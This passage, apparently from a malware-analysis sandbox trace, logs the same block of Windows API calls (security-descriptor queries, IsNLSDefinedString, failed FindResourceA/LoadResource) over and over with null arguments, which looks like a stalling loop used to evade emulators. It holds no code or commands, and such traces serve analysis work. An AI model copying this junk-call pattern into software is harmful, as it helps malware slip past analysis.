DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.961] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.961] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.961] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.961] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.961] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.961] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.961] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.961] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.961] LockResource (hResData=0x0) returned 0x0 [0069.961] FreeResource (hResData=0x0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.962] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.962] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.962] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.962] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.962] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.962] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.962] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.962] LockResource (hResData=0x0) returned 0x0 [0069.962] FreeResource (hResData=0x0) returned 0 [0069.962] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.963] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.963] LockResource (hResData=0x0) returned 0x0 [0069.963] FreeResource (hResData=0x0) returned 0 [0069.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.963] LockResource (hResData=0x0) returned 0x0 [0069.963] FreeResource (hResData=0x0) returned 0 [0069.963] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.963] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.963] LockResource (hResData=0x0) returned 0x0 [0069.963] FreeResource (hResData=0x0) returned 0 [0069.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.963] LockResource (hResData=0x0) returned 0x0 [0069.963] FreeResource (hResData=0x0) returned 0 [0069.963] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.963] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.963] LockResource (hResData=0x0) returned 0x0 [0069.963] FreeResource (hResData=0x0) returned 0 [0069.963] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.963] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.963] LockResource (hResData=0x0) returned 0x0 [0069.963] FreeResource (hResData=0x0) returned 0 [0069.963] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.963] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.963] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.964] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.964] LockResource (hResData=0x0) returned 0x0 [0069.964] FreeResource (hResData=0x0) returned 0 [0069.964] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.964] LockResource (hResData=0x0) returned 0x0 [0069.964] FreeResource (hResData=0x0) returned 0 [0069.964] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.964] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.964] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.964] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.964] LockResource (hResData=0x0) returned 0x0 [0069.964] FreeResource (hResData=0x0) returned 0 [0069.964] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.964] LockResource (hResData=0x0) returned 0x0 [0069.964] FreeResource (hResData=0x0) returned 0 [0069.964] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.964] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.964] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.964] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.964] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.965] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.965] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.965] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.965] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.965] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.965] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.965] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.965] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.965] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.965] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.965] LockResource (hResData=0x0) returned 0x0 [0069.965] FreeResource (hResData=0x0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.966] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.966] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.966] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.966] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.966] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.966] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.966] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.966] LockResource (hResData=0x0) returned 0x0 [0069.966] FreeResource (hResData=0x0) returned 0 [0069.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.967] LockResource (hResData=0x0) returned 0x0 [0069.967] FreeResource (hResData=0x0) returned 0 [0069.967] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.967] LockResource (hResData=0x0) returned 0x0 [0069.967] FreeResource (hResData=0x0) returned 0 [0069.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.967] LockResource (hResData=0x0) returned 0x0 [0069.967] FreeResource (hResData=0x0) returned 0 [0069.967] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.967] LockResource (hResData=0x0) returned 0x0 [0069.967] FreeResource (hResData=0x0) returned 0 [0069.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.967] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.967] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.967] LockResource (hResData=0x0) returned 0x0 [0069.967] FreeResource (hResData=0x0) returned 0 [0069.967] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.967] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.967] LockResource (hResData=0x0) returned 0x0 [0069.967] FreeResource (hResData=0x0) returned 0 [0069.967] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.967] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.968] LockResource (hResData=0x0) returned 0x0 [0069.968] FreeResource (hResData=0x0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.968] LockResource (hResData=0x0) returned 0x0 [0069.968] FreeResource (hResData=0x0) returned 0 [0069.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.968] LockResource (hResData=0x0) returned 0x0 [0069.968] FreeResource (hResData=0x0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.968] LockResource (hResData=0x0) returned 0x0 [0069.968] FreeResource (hResData=0x0) returned 0 [0069.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.968] LockResource (hResData=0x0) returned 0x0 [0069.968] FreeResource (hResData=0x0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.968] LockResource (hResData=0x0) returned 0x0 [0069.968] FreeResource (hResData=0x0) returned 0 [0069.968] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.968] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.968] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.968] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.968] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.969] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.969] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.969] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.969] LockResource (hResData=0x0) returned 0x0 [0069.969] FreeResource (hResData=0x0) returned 0 [0069.969] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.969] 